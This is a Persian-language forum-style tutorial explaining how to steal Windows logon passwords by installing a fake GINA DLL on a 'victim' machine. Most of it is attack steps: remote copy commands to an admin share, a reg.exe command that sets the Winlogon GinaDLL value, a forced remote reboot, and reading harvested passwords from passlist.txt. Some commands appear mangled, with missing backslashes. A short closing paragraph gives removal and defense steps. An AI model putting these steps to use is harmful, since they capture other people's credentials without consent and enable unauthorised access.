یک مدل خفن و ناشناخته دزدیدن کلمات عبور

با سلام ؛

Graphical Identification and Authorization یا به عبارت ساده تر GINA میدانید چه هست ؟؟ در واقع این واسطه ای بین کاربر و سیستم تعیین هویت ویندوز است ، خوب حالا اگر به جای نسخه اصلی آن ما یک نسخه سمی و دستکاری شده قرار بدهیم چگونه است !! بله درست فهمیدید به همین راحتی هر کاربری که به سیستم وارد شود ما به کلمه عبور آن پی میبریم .

به این منظور من به شما یک نوع Fake GINA را معرفی میکنم ، قبل از هر چیز به Ntsecurity.nu بروید و FakeGina.dll را که Arne Vidstrom نوشته را دریافت کنید ، خوب ما فکر میکنیم شما به سیستم دسترسی دارید و امتیاز شما در حد یک مدیر است ، در این هنگام با استفاده از دستور زیر FakeGina.dll را در پوشه %SystemRoot%system32 کپی میکنید (روی قربانی!!) .

• C:>copy fakegina.dll \ 10.1.1.3admin$system32

خوب حالا یک نگاهی به Resource Kit های بیلی می اندازیم و ابزار reg.exe را پیدا میکنیم و با سوءاستفاده از آن مقدار زیر را به Registry قربانی وارد میکنیم . (به مقدار توجه کنید)

• C:>reg add "SOFTWAREMicrosoftWindows NTCurrentVersionWinlogonGinaDLL=fakegina.dll" REG_SZ \10.1.1.3

خوب حالا نگاهی دوباره به Resource Kit های بیلی می اندازیم و ابزار shutdown را پیدا میکنیم و با سوء استفاده از آن سیستم را دوباره راه اندازی میکنیم .

• C:>shutdown \10.1.1.3 /R /T:1 /Y /C

خوب عملیات دزدی به پایان رسید حالا منتظر میشویم یک کاربر به سیستم وارد شود ، وقتی وارد شد کافی است که شما یک نگاهی به فایل %SystemRoot%system32passlist.txt بیندازید .

راه دفاع :

قبل از هر چیز fakegina.dll و passlist.txt را جستجو کنید اگر آنها را یافتید که آنها را نابود کنید ، حال بهتر است یک نسخه GINA سالم را دوباره نصب کنید !! و کلید Registry را به حالت اول باز گردانید . ( البته من توصیه میکنم یک بار دیگه بیلی را روی سیستم خود نصب کنید . )